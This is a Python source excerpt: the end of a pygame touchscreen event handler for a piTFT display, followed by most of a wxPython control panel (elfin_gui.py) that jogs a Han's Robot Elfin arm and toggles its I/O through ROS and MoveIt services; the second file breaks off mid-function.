if input_event.code == evdev.ecodes.ABS_X:
event['x'] = input_event.value
elif input_event.code == evdev.ecodes.ABS_Y:
event['y'] = input_event.value
elif input_event.code == evdev.ecodes.ABS_MT_TRACKING_ID:
event['id'] = input_event.value
if input_event.value == -1:
event['x'] = None
event['y'] = None
event['touch'] = None
elif input_event.code == evdev.ecodes.ABS_MT_POSITION_X:
pass
elif input_event.code == evdev.ecodes.ABS_MT_POSITION_Y:
pass
elif input_event.type == evdev.ecodes.EV_KEY:
event['touch'] = input_event.value
elif input_event.type == evdev.ecodes.SYN_REPORT:
event['time'] = input_event.timestamp()
print("{}".format(event))
self.events.put(event)
e = event
event = {'x': e['x'], 'y': e['y']}
try:
event['id'] = e['id']
except KeyError:
event['id'] = None
try:
event['touch'] = e['touch']
except KeyError:
event['touch'] = None
def __del__(self):
self.shutdown.set()
class TftEvHandler(object):
pitft = TftTouchscreen(Screen.TouchscreenInput)
prev_loc = {'x': False, 'y': False}
event_state = 0
def start(self, rotation = 90):
self.pitft.rotation = rotation
self.pitft.start()
def run(self):
pass
def stop(self):
self.pitft.shutdown.set()
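# Capacitive piTFT panels report coordinates in the panel's native orientation, so the
# handler below swaps the axes, mirrors them for the supported 90/270 degree display
# rotations, and re-posts each sample as a pygame MOUSEBUTTONDOWN/MOUSEMOTION/
# MOUSEBUTTONUP event at the translated position.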
class TftCapacitiveEvHandler(TftEvHandler):
def run(self):
while not self.pitft.queue_empty():
for ts_event in self.pitft.get_event():
pg_event = {'y': self.prev_loc['y'], 'x': self.prev_loc['x']}
if ts_event['x'] is not None:
pg_event['y'] = ts_event['x']
if ts_event['y'] is not None:
pg_event['x'] = ts_event['y']
if pg_event['x'] is None or pg_event['y'] is None:
break
self.prev_loc = {'y': pg_event['y'], 'x': pg_event['x']}
if self.pitft.rotation == 90:
pg_event = {'x': pg_event['x'], 'y': 240 - pg_event['y']}
elif self.pitft.rotation == 270:
pg_event = {'x': 320 - pg_event['x'], 'y': pg_event['y']}
else:
raise (Exception("Unsupported display rotation"))
pg_dict = {}
pg_event_type = MOUSEBUTTONUP if ts_event['touch'] == 0 else (
MOUSEBUTTONDOWN if self.event_state == 0 else MOUSEMOTION)
if pg_event_type == MOUSEBUTTONDOWN:
self.event_state = 1
pg_dict['button'] = 1
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
pygame.mouse.set_pos(pg_event['x'], pg_event['y'])
elif pg_event_type == MOUSEBUTTONUP:
self.event_state = 0
pg_dict['button'] = 1
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
else:
pg_dict['buttons'] = (True, False, False)
pg_dict['rel'] = (0, 0)
pg_dict['pos'] = (pg_event['x'], pg_event['y'])
pygame.mouse.set_pos(pg_event['x'], pg_event['y'])
pe = pygame.event.Event(pg_event_type, pg_dict)
pygame.event.post(pe)
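# --- Illustrative usage sketch (not part of the original module) ---
# Assumes a piTFT capacitive touchscreen at Screen.TouchscreenInput and that pygame has
# already been initialised with a display surface; the polling loop below is only an
# example of how the handler is meant to be driven.
if __name__ == "__main__":
    handler = TftCapacitiveEvHandler()
    handler.start(rotation=90)        # spawn the evdev reader thread
    try:
        while True:
            handler.run()             # translate queued touches into pygame mouse events
            for ev in pygame.event.get():
                if ev.type == MOUSEBUTTONDOWN:
                    print("touch at {}".format(ev.pos))
    except KeyboardInterrupt:
        handler.stop()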
|
elfin_gui.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 28 12:18:05 2017
@author: Cong Liu
Software License Agreement (BSD License)
Copyright (c) 2017, Han's Robot Co., Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# author: Cong Liu
from __future__ import division
import rospy
import math
import os # 20201209: add os path
import tf
import moveit_commander
from std_msgs.msg import Bool, String
from std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse
from elfin_robot_msgs.srv import SetString, SetStringRequest, SetStringResponse
from elfin_robot_msgs.srv import SetInt16, SetInt16Request
from elfin_robot_msgs.srv import *
import wx
from sensor_msgs.msg import JointState
from actionlib import SimpleActionClient
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
import threading
import dynamic_reconfigure.client
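# MyFrame builds the wxPython control panel: jog buttons for the six joints and the six
# Cartesian axes, Servo On/Off, Clear Fault, Home and Stop controls, DO/DI/LED/end-button
# indicators and a velocity-scaling slider, all wired to the elfin_basic_api,
# elfin_ros_control and MoveIt interfaces configured in __init__ below.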
class MyFrame(wx.Frame):
def __init__(self,parent,id):
the_size=(700, 700) # height from 550 change to 700
wx.Frame.__init__(self,parent,id,'Elfin Control Panel',pos=(250,100))
self.panel=wx.Panel(self)
font=self.panel.GetFont()
font.SetPixelSize((12, 24))
self.panel.SetFont(font)
self.listener = tf.TransformListener()
self.robot=moveit_commander.RobotCommander()
self.scene=moveit_commander.PlanningSceneInterface()
self.group=moveit_commander.MoveGroupCommander('elfin_arm')
self.controller_ns='elfin_arm_controller/'
self.elfin_driver_ns='elfin_ros_control/elfin/'
self.elfin_IO_ns='elfin_ros_control/elfin/io_port1/' # 20201126: add IO ns
self.call_read_do_req = ElfinIODReadRequest()
self.call_read_di_req = ElfinIODReadRequest()
self.call_read_do_req.data = True
self.call_read_di_req.data = True
self.call_read_do = rospy.ServiceProxy(self.elfin_IO_ns+'read_do',ElfinIODRead)
self.call_read_di = rospy.ServiceProxy(self.elfin_IO_ns+'read_di',ElfinIODRead)
# 20201126: add service for write_do
self.call_write_DO=rospy.ServiceProxy(self.elfin_IO_ns+'write_do',ElfinIODWrite)
self.elfin_basic_api_ns='elfin_basic_api/'
self.joint_names=rospy.get_param(self.controller_ns+'joints', [])
self.ref_link_name=self.group.get_planning_frame()
self.end_link_name=self.group.get_end_effector_link()
self.ref_link_lock=threading.Lock()
self.end_link_lock=threading.Lock()
self.DO_btn_lock = threading.Lock() # 20201208: add the threading lock
self.DI_show_lock = threading.Lock()
self.js_display=[0]*6 # joint_states
self.jm_button=[0]*6 # joints_minus
self.jp_button=[0]*6 # joints_plus
self.js_label=[0]*6 # joint_states
self.ps_display=[0]*6 # pcs_states
self.pm_button=[0]*6 # pcs_minus
self.pp_button=[0]*6 # pcs_plus
self.ps_label=[0]*6 # pcs_states
# 20201208: add the button array
self.DO_btn_display=[0]*4 # DO states
self.DI_display=[0]*4 # DI states
self.LED_display=[0]*4 # LED states
self.End_btn_display=[0]*4 # end button states
self.btn_height=370 # 20201126: from 390 change to 370
self.btn_path = os.path.dirname(os.path.realpath(__file__)) # 20201209: get the elfin_gui.py path
btn_lengths=[]
self.DO_DI_btn_length=[0,92,157,133] # 20201209: widths taken from the Servo On, Servo Off, Home and Stop buttons
self.btn_interstice=22 # 20201209: initial gap between buttons; recomputed from the button widths below
self.display_init()
self.key=[]
self.DO_btn=[0,0,0,0,0,0,0,0] # DO state: first four entries are the DOs, the last four are the LEDs
self.DI_show=[0,0,0,0,0,0,0,0] # DI state: first four entries are the DIs, the last four are the end buttons
self.power_on_btn=wx.Button(self.panel, label=' Servo On ', name='Servo On',
pos=(20, self.btn_height))
btn_lengths.append(self.power_on_btn.GetSize()[0])
btn_total_length=btn_lengths[0]
self.power_off_btn=wx.Button(self.panel, label=' Servo Off ', name='Servo Off')
btn_lengths.append(self.power_off_btn.GetSize()[0])
btn_total_length+=btn_lengths[1]
self.reset_btn=wx.Button(self.panel, label=' Clear Fault ', name='Clear Fault')
btn_lengths.append(self.reset_btn.GetSize()[0])
btn_total_length+=btn_lengths[2]
self.home_btn=wx.Button(self.panel, label='Home', name='home_btn')
btn_lengths.append(self.home_btn.GetSize()[0])
btn_total_length+=btn_lengths[3]
self.stop_btn=wx.Button(self.panel, label='Stop', name='Stop')
btn_lengths.append(self.stop_btn.GetSize()[0])
btn_total_length+=btn_lengths[4]
self.btn_interstice=(550-btn_total_length)/4
btn_pos_tmp=btn_lengths[0]+self.btn_interstice+20 # 20201126: 20 px left margin + width of button 0 + gap
self.power_off_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[1]+self.btn_interstice
self.reset_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[2]+self.btn_interstice
self.home_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[3]+self.btn_interstice
self.stop_btn.SetPosition((btn_pos_tmp, self.btn_height))
self.servo_state_label=wx.StaticText(self.panel, label='Servo state:',
pos=(590, self.btn_height-10))
self.servo_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+10))
self.servo_state=bool()
self.servo_state_lock=threading.Lock()
self.fault_state_label=wx.StaticText(self.panel, label='Fault state:',
pos=(590, self.btn_height+60))
self.fault_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+80))
self.fault_state=bool()
self.fault_state_lock=threading.Lock()
# 20201209: add the description of end button
self.end_button_state_label=wx.StaticText(self.panel, label='END Button state',
pos=(555,self.btn_height+172))
self.reply_show_label=wx.StaticText(self.panel, label='Result:',
pos=(20, self.btn_height+260)) # 20201126: btn_height from 120 change to 260.
self.reply_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', size=(670, 30), pos=(20, self.btn_height+280))# 20201126: btn_height from 140 change to 280.
link_textctrl_length=(btn_pos_tmp-40)/2
self.ref_links_show_label=wx.StaticText(self.panel, label='Ref. link:',
pos=(20, self.btn_height+210)) # 20201126: btn_height from 60 change to 210.
self.ref_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.ref_link_name, size=(link_textctrl_length, 30),
pos=(20, self.btn_height+230)) # 20201126: btn_height from 80 change to 230.
self.end_link_show_label=wx.StaticText(self.panel, label='End link:',
pos=(link_textctrl_length+30, self.btn_height+210))# 20201126: btn_height from 80 change to 200.
self.end_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.end_link_name, size=(link_textctrl_length, 30),
pos=(link_textctrl_length+30, self.btn_height+230))
self.set_links_btn=wx.Button(self.panel, label='Set links', name='Set links')
self.set_links_btn.SetPosition((btn_pos_tmp, self.btn_height+230)) # 20201126: btn_height from 75 change to 220.
# the variables about velocity scaling
velocity_scaling_init=rospy.get_param(self.elfin_basic_api_ns+'velocity_scaling',
default=0.4)
default_velocity_scaling=str(round(velocity_scaling_init, 2))
self.velocity_setting_label=wx.StaticText(self.panel, label='Velocity Scaling',
pos=(20, self.btn_height-55)) # 20201126: btn_height from 70 change to 55
self.velocity_setting=wx.Slider(self.panel, value=int(velocity_scaling_init*100),
minValue=1, maxValue=100,
style = wx.SL_HORIZONTAL,
size=(500, 30),
pos=(45, self.btn_height-35)) # 20201126: btn_height from 70 change to 35
self.velocity_setting_txt_lower=wx.StaticText(self.panel, label='1%',
pos=(20, self.btn_height-35)) # 20201126: btn_height from 45 change to 35
self.velocity_setting_txt_upper=wx.StaticText(self.panel, label='100%',
pos=(550, self.btn_height-35))# 20201126: btn_height from 45 change to 35
self.velocity_setting_show=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER|wx.TE_READONLY),
value=default_velocity_scaling,
pos=(600, self.btn_height-45))# 20201126: btn_height from 55 change to 45
self.velocity_setting.Bind(wx.EVT_SLIDER, self.velocity_setting_cb)
self.teleop_api_dynamic_reconfig_client=dynamic_reconfigure.client.Client(self.elfin_basic_api_ns,
config_callback=self.basic_api_reconfigure_cb)
self.dlg=wx.Dialog(self.panel, title='message')
self.dlg.Bind(wx.EVT_CLOSE, self.closewindow)
self.dlg_panel=wx.Panel(self.dlg)
self.dlg_label=wx.StaticText(self.dlg_panel, label='hello', pos=(15, 15))
self.set_links_dlg=wx.Dialog(self.panel, title='Set links', size=(400, 100))
self.set_links_dlg_panel=wx.Panel(self.set_links_dlg)
self.sld_ref_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 20), size=(link_textctrl_length, 30))
self.sld_end_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 70), size=(link_textctrl_length, 30))
self.sld_set_ref_link_btn=wx.Button(self.set_links_dlg_panel, label='Update ref. link',
name='Update ref. link')
self.sld_set_ref_link_btn.SetPosition((link_textctrl_length+30, 15))
self.sld_set_end_link_btn=wx.Button(self.set_links_dlg_panel, label='Update end link',
name='Update end link')
self.sld_set_end_link_btn.SetPosition((link_textctrl_length+30, 65))
self.set_links_dlg.SetSize((link_textctrl_length+self.sld_set_ref_link_btn.GetSize()[0]+50, 120))
self.call_teleop_joint=rospy.ServiceProxy(self.elfin_basic_api_ns+'joint_teleop',
SetInt16)
self.call_teleop_joint_req=SetInt16Request()
self.call_teleop_cart=rospy.ServiceProxy(self.elfin_basic_api_ns+'cart_teleop',
SetInt16)
self.call_teleop_cart_req=SetInt16Request()
self.call_teleop_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_teleop_stop_req=SetBoolRequest()
self.call_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_stop_req=SetBoolRequest()
self.call_stop_req.data=True
self.stop_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_stop,
rq=self.call_stop_req :
self.call_set_bool_common(evt, cl, rq))
self.call_reset=rospy.ServiceProxy(self.elfin_driver_ns+'clear_fault', SetBool)
self.call_reset_req=SetBoolRequest()
self.call_reset_req.data=True
self.reset_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_reset,
rq=self.call_reset_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_on=rospy.ServiceProxy(self.elfin_basic_api_ns+'enable_robot', SetBool)
self.call_power_on_req=SetBoolRequest()
self.call_power_on_req.data=True
self.power_on_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_on,
rq=self.call_power_on_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_off=rospy.ServiceProxy(self.elfin_basic_api_ns+'disable_robot', SetBool)
self.call_power_off_req=SetBoolRequest()
self.call_power_off_req.data=True
self.power_off_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_off,
rq=self.call_power_off_req :
self.call_set_bool_common(evt, cl, rq))
self.call_move_homing=rospy.ServiceProxy(self.elfin_basic_api_ns+'home_teleop',
SetBool)
self.call_move_homing_req=SetBoolRequest()
self.call_move_homing_req.data=True
self.home_btn.Bind(wx.EVT_LEFT_DOWN,
lambda evt, cl=self.call_move_homing,
rq=self.call_move_homing_req :
self.call_set_bool_common(evt, cl, rq))
self.home_btn.Bind(wx.EVT_LEFT_UP,
lambda evt, mark=100:
self.release_button(evt, mark) )
self.call_set_ref_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_reference_link', SetString)
self.call_set_end_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_end_link', SetString)
self.set_links_btn.Bind(wx.EVT_BUTTON, self.show_set_links_dialog)
self.sld_set_ref_link_btn.Bind(wx.EVT_BUTTON, self.update_ref_link)
self.sld_set_end_link_btn.Bind(wx.EVT_BUTTON, self.update_end_link)
self.sld_ref_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_ref_link)
self.sld_end_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_end_link)
self.action_client=SimpleActionClient(self.controller_ns+'follow_joint_trajectory',
FollowJointTrajectoryAction)
self.action_goal=FollowJointTrajectoryGoal()
self.action_goal.trajectory.joint_names=self.joint_names
self.SetMinSize(the_size)
self.SetMaxSize(the_size)
def display_init(self):
js_pos=[20, 20]
js_btn_length=[70, 70, 61, 80]
js_distances=[10, 20, 10, 26]
dis_h=50
for i in xrange(len(self.js_display)):
self.jp_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' +',
pos=(js_pos[0],
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=js_btn_length[0]+js_distances[0]
self.jp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_joints(evt, mark) )
self.jp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.jm_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' -',
pos=(js_pos[0]+dis_tmp,
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=js_btn_length[1]+js_distances[1]
self.jm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_joints(evt, mark) )
self.jm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_js_label=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_label[i]=wx.StaticText(self.panel,
label='J'+str(i+1)+'/deg:',
pos=pos_js_label)
self.js_label[i].SetPosition((pos_js_label[0], pos_js_label[1]+abs(40-self.js_label[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[2]+js_distances[2]
pos_js_display=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value=' 0000.00 ',
pos=pos_js_display)
self.js_display[i].SetPosition((pos_js_display[0], pos_js_display[1]+abs(40-self.js_display[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[3]+js_distances[3]
ps_pos=[js_pos[0]+dis_tmp, 20]
ps_btn_length=[70, 70, 53, 80]
ps_distances=[10, 20, 10, 20]
pcs_btn_label=['X', 'Y', 'Z', 'Rx', 'Ry', 'Rz']
pcs_label=['X', 'Y', 'Z', 'R', 'P', 'Y']
unit_label=['/mm:', '/mm:', '/mm:', '/deg:', '/deg:', '/deg:']
for i in xrange(len(self.ps_display)):
self.pp_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' +',
pos=(ps_pos[0],
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=ps_btn_length[0]+ps_distances[0]
self.pp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_pcs(evt, mark) )
self.pp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.pm_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' -',
pos=(ps_pos[0]+dis_tmp,
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=ps_btn_length[1]+ps_distances[1]
self.pm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_pcs(evt, mark) )
self.pm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_ps_label=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_label[i]=wx.StaticText(self.panel,
label=pcs_label[i]+unit_label[i],
pos=pos_ps_label)
self.ps_label[i].SetPosition((pos_ps_label[0], pos_ps_label[1]+abs(40-self.ps_label[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[2]+ps_distances[2]
pos_ps_display=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value='',
pos=pos_ps_display)
self.ps_display[i].SetPosition((pos_ps_display[0], pos_ps_display[1]+abs(40-self.ps_display[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[3]+ps_distances[3]
        # 20201209: add the DO, LED, DI and End_btn widgets.
for i in xrange(len(self.DO_btn_display)):
self.DO_btn_display[i]=wx.Button(self.panel,label='DO'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+40))
self.DO_btn_display[i].Bind(wx.EVT_BUTTON,
lambda evt,marker=i,cl=self.call_write_DO :
self.call_write_DO_command(evt,marker,cl))
self.DI_display[i]=wx.TextCtrl(self.panel, style=(wx.TE_CENTER | wx.TE_READONLY), value='DI'+str(i),
size=(self.DO_btn_display[i].GetSize()),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+80))
self.LED_display[i]=wx.Button(self.panel,label='LED'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+120))
self.LED_display[i].Bind(wx.EVT_BUTTON,
lambda evt, marker=4+i, cl=self.call_write_DO :
self.call_write_DO_command(evt, marker,cl))
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i)+'_low.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.End_btn_display[i]=wx.StaticBitmap(self.panel,-1,png,
pos=(40+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+160))
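    # Note on the Bind() lambdas used above: the loop index is captured through
    # a default argument (mark=i+1 / mark=-1*(i+1)) so each button handler keeps
    # its own value; a plain closure over `i` would make every handler see the
    # final loop value. Minimal illustration with made-up names:
    #
    #   handlers = [lambda evt, mark=k: some_callback(evt, mark) for k in range(3)]
    #   # each handler passes its own k (0, 1, 2), not the last one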
def velocity_setting_cb(self, event):
current_velocity_scaling=self.velocity_setting.GetValue()*0.01
self.teleop_api_dynamic_reconfig_client.update_configuration({'velocity_scaling': current_velocity_scaling})
wx.CallAfter(self.update_velocity_scaling_show, current_velocity_scaling)
def basic_api_reconfigure_cb(self, config):
if self.velocity_setting_show.GetValue()!=config.velocity_scaling:
self.velocity_setting.SetValue(int(config.velocity_scaling*100))
wx.CallAfter(self.update_velocity_scaling_show, config.velocity_scaling)
def action_stop(self):
self.action_client.wait_for_server(timeout=rospy.Duration(secs=0.5))
self.action_goal.trajectory.header.stamp.secs=0
self.action_goal.trajectory.header.stamp.nsecs=0
self.action_goal.trajectory.points=[]
self.action_client.send_goal(self.action_goal)
def teleop_joints(self,event,mark):
self.call_teleop_joint_req.data=mark
resp=self.call_teleop_joint.call(self.call_teleop_joint_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def teleop_pcs(self,event,mark):
self.call_teleop_cart_req.data=mark
resp=self.call_teleop_cart.call(self.call_teleop_cart_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def release_button(self, event, mark):
self.call_teleop_stop_req.data=True
resp=self.call_teleop_stop.call(self.call_teleop_stop_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def call_set_bool_common(self, event, client, request):
btn=event.GetEventObject()
check_list=['Servo On', 'Servo Off', 'Clear Fault']
# Check servo state
if btn.GetName()=='Servo On':
servo_enabled=bool()
if self.servo_state_lock.acquire():
servo_enabled=self.servo_state
self.servo_state_lock.release()
if servo_enabled:
resp=SetBoolResponse()
resp.success=False
resp.message='Robot is already enabled'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check fault state
if btn.GetName()=='Clear Fault':
fault_flag=bool()
if self.fault_state_lock.acquire():
fault_flag=self.fault_state
self.fault_state_lock.release()
if not fault_flag:
resp=SetBoolResponse()
resp.success=False
resp.message='There is no fault now'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check if the button is in check list
if btn.GetName() in check_list:
self.show_message_dialog(btn.GetName(), client, request)
else:
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def thread_bg(self, msg, client, request):
wx.CallAfter(self.show_dialog)
if msg=='Servo Off':
self.action_stop()
rospy.sleep(1)
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
wx.CallAfter(self.destroy_dialog)
# 20201201: add function for processing value to DO_btn
def process_DO_btn(self,value):
if self.DO_btn_lock.acquire():
for i in range(0,8):
tmp = (value >> (12 + i)) & 0x01
self.DO_btn[i]=tmp
self.DO_btn_lock.release()
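    # The value read back is treated as a bit field: process_DO_btn takes the DO
    # states from bits 12..19, and call_write_DO_command below shifts an 8-bit
    # mask left by 12 before writing. Worked example (illustrative value only,
    # not taken from the driver documentation):
    #
    #   value = 0b101 << 12                               # DO0 and DO2 set
    #   [(value >> (12 + i)) & 0x01 for i in range(8)]    # -> [1, 0, 1, 0, 0, 0, 0, 0]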
# 20201201: add function to read DO.
def call_read_DO_command(self):
try:
client = self.call_read_do
val = client.call(self.call_read_do_req).digital_input
self.process_DO_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
    # 20201201: add function for processing the DI value
def process_DI_btn(self,value):
if self.DI_show_lock.acquire():
if value > 0:
for i in range(0,8):
tmp = (value >> (16 + i)) & 0x01
self.DI_show[i]=tmp
else:
self.DI_show = [0,0,0,0,0,0,0,0]
self.DI_show_lock.release()
# 20201201: add function to read DI.
def call_read_DI_command(self):
try:
client = self.call_read_di
val = client.call(self.call_read_di_req).digital_input
self.process_DI_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201202: add function to read DO and DI.
def monitor_DO_DI(self,evt):
self.call_read_DI_command()
self.call_read_DO_command()
# 20201126: add function to write DO.
def call_write_DO_command(self, event, marker, client):
self.justification_DO_btn(marker)
request = 0
try:
self.DO_btn_lock.acquire()
for i in range(0,8):
request = request + self.DO_btn[i]*pow(2,i)
resp=client.call(request << 12)
self.DO_btn_lock.release()
except rospy.ServiceException, e:
self.DO_btn_lock.release()
resp=ElfinIODWriteResponse()
resp.success=False
self.justification_DO_btn(marker)
rp=SetBoolResponse()
rp.success=False
rp.message='no such service for DO control'
wx.CallAfter(self.update_reply_show, rp)
    # 20201127: toggle the selected DO_btn entry
def justification_DO_btn(self,marker):
self.DO_btn_lock.acquire()
if 0 == self.DO_btn[marker]:
self.DO_btn[marker] = 1
else:
self.DO_btn[marker] = 0
self.DO_btn_lock.release()
# 20201201: add function to set DO_btn colour
def set_DO_btn_colour(self):
self.DO_btn_lock.acquire()
for i in range(0,4):
if 0 == self.DO_btn[i]:
self.DO_btn_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DO_btn_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201201: add function to set DI_show colour
def set_DI_show_colour(self):
self.DI_show_lock.acquire()
for i in range(0,4):
if 0 == self.DI_show[i]:
self.DI_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DI_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DI_show_lock.release()
# 20201207: add function to set LED colour
def set_LED_show_colour(self):
self.DO_btn_lock.acquire()
for i in range(4,8):
if 0 == self.DO_btn[i]:
self.LED_display[i-4].SetBackgroundColour(wx.NullColour)
else:
self.LED_display[i-4].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201207: add function to set End_btn colour
def set_End_btn_colour(self):
self.DI_show_lock.acquire()
for i in range(4,8):
if 0 == self.DI_show[i]:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_low.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
else:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_high.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
self.DI_show_lock.release()
def set_color(self, evt):
wx.CallAfter(self.set_DO_btn_colour)
wx.CallAfter(self.set_DI_show_colour)
wx.CallAfter(self.set_LED_show_colour)
wx.CallAfter(self.set_End_btn_colour)
def show_message_dialog(self, message, cl, rq):
msg='executing ['+message+']'
self.dlg_label.SetLabel(msg)
        label_size=[]
        label_size.append(self.dlg_label.GetSize()[0])
        label_size.append(self.dlg_label.GetSize()[1])
        self.dlg.SetSize((label_size[0]+30, label_size[1]+30))
t=threading.Thread(target=self.thread_bg, args=(message, cl, rq,))
t.start()
def show_dialog(self):
self.dlg.SetPosition((self.GetPosition()[0]+250,
self.GetPosition()[1]+250))
self.dlg.ShowModal()
def destroy_dialog(self):
self.dlg.EndModal(0)
def closewindow(self,event):
pass
def show_set_links_dialog(self, evt):
